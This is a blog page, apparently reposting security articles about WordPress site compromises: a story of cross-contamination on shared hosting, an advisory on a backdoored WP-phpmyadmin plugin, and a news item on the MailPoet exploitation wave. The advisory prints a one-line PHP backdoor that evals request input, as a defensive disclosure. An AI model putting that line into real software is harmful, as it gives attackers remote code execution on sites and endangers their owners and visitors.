A Little Tale About Website Cross-Contamination

Admin "Kunal Vohra"

Mary has a site that she really cares about, its called mycoolsite.com. She has learned how to monetize her blog through the use of ads, this allows her to make her living. She uses WordPress and always keep it updated. She also keeps her plugins updated, uses strong passwords, accesses the admin panel via SSL and takes all the security recommendations very seriously.

She uses a shared server and her host offers her unlimited domains. Over the years she has taken advantage of this offering, adding a few sites here and there. One such site was mytestsite.com, it’s used to try new themes and plugins.

It has been at least a year since she has touched one of her other sites – mytestsite.com, it hasn’t been updated and houses a plugin that has since been removed from the WordPress repository. Little does Mary know that it was removed from the repository for having a very serious security vulnerability.

Part 1: The bad guys came…

---

Like in any story, the bad guys wasted no time in finding and exploiting this vulnerability.

They had a list with millions of sites that they were scanning daily (based on Alexa). They found her mycoolsite.com (which was ranking very well) and tried to exploit it without success. They looked for any potential attack vector; things like the WP version, vulnerable plugins, weak passwords (making use of brute force and dictionary attacks), they used a slew of tools in their arsenal, nothing worked. She won that battle.

A few days later, using a number of techniques they found that on the same server she had another site,mytestsite.com. Unlike mycoolsite.com, using the same techniques as before, they were able to gain access. They quickly found the vulnerable plugin and leveraged its vulnerability to gain access. Oh, well that’s cool, its only her unimportant site, mytestsite.com, who cares, right?

Part 2: How did my site get hacked?

---

The next day, she wakes up to emails from her users complaining that mycoolsite.com is causing their local anti-viruses to set off alerts and or blocking her site. The first thing she does is go to her site to see what’s going. She is greeted with an  scary warning, “This site may harm your computer”!

“EEK!! What is going on? How did my site get hacked? I did everything right!! I followed all the recommendations!!!

Part 3: Website Cross Contamination

---

In part 1, we left you with a question: “Oh, well that’s cool, its only her unimportant site, mytestsite.com, who cares, right?”

WRONG!!

Yes, Mary did everything right to protect her mycoolsite.com. What she didn’t do is apply those same principles to all her sites. She forgot that because the other sites are on the same shared account (and can be managed by the same user), any vulnerability on them can be used to compromise her whole account.

Once on the server the attacker was able to introduce all kinds of malicious code, from backdoors to actionable code. Like any virus, it replicated itself, inserting itself into every PHP file it could find. This spread across every directory on her site without remorse.

That folks, is all she wrote…

Part 4: Fixing the Problem

---

Like you would expect, Mary contacted a company to fix her site, mycoolsite.com. The company went through and removed all the malicious code to include backdoors. Phew! It was now showing correct again, all warnings were gone.

She even took a few more steps this time around, she blocked wp-admin access by IP address and installed all security plugins she could find. Victory?

Part 5: Website Cross Contamination and Reinfections

---

Nope. Not even close. Within an hour everything Mary thought she had cleared had reappeared.

Why did this happen when she had done everything by the book? Even hired a company to get it fixed?

The answer is simple, it’s a concept known as cross contamination. It’s actually very simple to understand. We all know how viruses work, they spread. No point in having a virus that doesn’t spread, where is the fun in that.

Same applies to web malware. It duplicates itself, injecting itself in little dark directories you never check, or care to check. Places you would not even think of. You might have a directory for all your JavaScript files, in there you might find a PHP shell file. You might have a directory for images and one of those PNG files might be masking itself as an executable.

Mary did what most people do, she fixed the infection but not the root problem. She spent a week cleaning her little site day in and day out, looking for some relief to the problem Demanding someone fix this problem for good!

She finally took the additional steps recommended, scrubbing her server. She was dismayed at what was found. She was elated, yet heart broken at the amount of energy she had put into the effort. After a week of work, lost sleep, significant impact to her Alexa ranking, and many other effects, some monetary, some not, Mary finally had control of her server again.

Pulling it Together

This very real tale is meant to better articulate, by providing an example, the concept of website cross contamination and how serious an issue it is.

The point is very simple, if you have many sites on the same account (running under the same user), anyone of them can be used to compromise the others. The attackers don’t care how important a site is to you, all they want is an access point.

It’s unfortunate, but we see this all the time. It’s why one of the first things we do is scan the server, if allowed, for software versions and known vulnerabilities. Its sad to report that too often we find things like this:

/mycoolsite.com (WordPress 3.3.1)

/mycoolsite.com_backup_1 (WordPress 3.1) – Out of Date

/mycoolsite.com_backup_2 (WordPress 3.2.1) – Out of Date

/mycoolsite.com_backup_3 (WordPress 3.2.1) – Out of Date

/myplaysite.com (WordPress 1.5) – Not even kidding about the version. – Out of Date

/myunimportantsite.com (Joomla 1.4) – Out of Date

Action item: Check your server today. When you do, ask yourself:

• Did you ever install test sites, plugins or themes that you might not use anymore?
• Do you have old domains running on the same server/account that you don’t care about anymore? Delete them all (clean your garage) to avoid this issue.
• Feel free to use free scanner to see if your sites are up to date: http://sitecheck.sucuri.net.
• Read this article as well: Debug Software From Your Site

Only keep the minimum necessary files, themes and plugins that allow your site to function perfectly. Everything else should be disabled or moved to a separate server. While you can never say your risk is 0 it does not mean you can’t work to reduce it.

Still Having Problem..!!! Connect with Admin 

 Kunal Vohra Download Our Official Android App & Get Free Internet

"The Hackers Street"

For Daily Updates 

WP-phpmyadmin WordPress plugin – Delete it now

Admin "Kunal Vohra"

If you are using the WP-phpmyadmin WordPress plugin, delete it now. We are seeing multiple sites getting hacked through it and we are investigating what is going on.

On all the sites we’ve analyzed, the following code was found inside the wp-phpmyadmin/phpmyadmin/upgrade.php file:

<?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?>

This is not part of the plugin, and should be removed immediately!

The code snippet above is a backdoor and allows remote access to the affected sites with it installed.

We also noticed that it was removed from the WordPress plugin repository (originally here: wordpress.org/extend/plugins/wp-phpmyadmin/ ) and is no longer maintained (last update in 2007). Since it is not longer being updated, you shouldn’t be using it anymore.

EDIT: We had an opportunity to catch up with Andrew Nacin, a WordPress Core Member who stated:

The reason it had been pulled from the directory was that it had phpMyAdmin setup files in it, which can expose server information.

So the plugin wasn’t removed because of any security issue, but because of the recent weird activity and due to the fact that it is not maintained, we recommend deleting it as soon as possible.

---

If you’re seeing anything out of the ordinary, please let us know. If we find anything else, we will update the post.

Still Having Problem..!!! Connect with Admin Kunal Vohra Download Our Official Android App  "The Hackers Street" For Daily Updates

50,000 Websites Hacked Through MailPoet WordPress Plugin Vulnerability

The users of WordPress, a free and open source blogging tool as well as content management system (CMS), that have a popular unpatched wordPress plugin installed are being cautioned to upgrade their sites immediately.

A serious vulnerability in the WordPress plugin, MailPoet, could essentially allows an attacker to inject any file including malware, defacements and spam, whatever they wanted on the server and that too without any authentication.

MailPoet, formerly known as Wysija Newsletter, is a WordPress plugin with more than 1.7 million downloads that allows developers running WordPress to send newsletters and manage subscribers within the content management system.

In a blog post, the security researcher and CEO of the security firm Sucuri, Daniel Cid, pointed out the vulnerability to be serious and said that within three weeks since the vulnerability unveiled, over 50,000 websites have been remotely exploited by the cybercriminals to install backdoors targeting the vulnerable MailPoet plugin.

Some of those compromised websites don't even run WordPress or don't have MailPoet plugin enabled in it, as the malware can infect any website that resides on the server of a hacked WordPress website, according the researcher.

"The malware code had some bugs: it was breaking many websites, overwriting good files and appending various statements in loops at the end of files," Cid said in a blog post. "All the hacked sites were either using MailPoet or had it installed on another sites within the same shared account --cross-contamination still matters.”

"To be clear, the MailPoet vulnerability is the entry point, it doesn't mean your website has to have it enabled or that you have it on the website; if it resides on the server, in a neighbouring website, it can still affect your website."

The security firm first reported about the vulnerability on the beginning of this month. The backdoor installed is a very nasty and creates an admin account that gives attackers full administrative control. It also injects backdoor code into all themes and core files.

The worst part with this infection is that the malicious code also overwrites valid files, which are very difficult to recover without a good backup in place. It causes many websites to fall over and display the message:

Parse error: syntax error, unexpected ‘)’ in /home/user/public_html/site/wp-config.php on line 91.

The Security firm is clarifying that every build of MailPoet is vulnerable except the only version which is the most recent released 2.6.7. So, users are recommended to update it as soon as possible.

Sucuri security firm is very dedicated in finding vulnerabilities in the WordPress CMS and encouraging users to install the updates. A week ago, it urged the users to upgrade WordPress version due to a vulnerability found in the WPtouch WordPress plugin that could potentially allow any non-administrative logged-in user to upload malicious PHP files or backdoors to the target server without any admin privileges.

Sucuri also found two serious vulnerabilities in the popular WordPress SEO plugin called “All in One SEO Pack” and a critical Remote Code Execution (RCE) flaw in “Disqus Comment System” Plugin of Wordpress few weeks before.

Still Having Problem..!!! Connect with Admin Kunal Vohra Download Our Official Android App  "The Hackers Street" For Daily Updates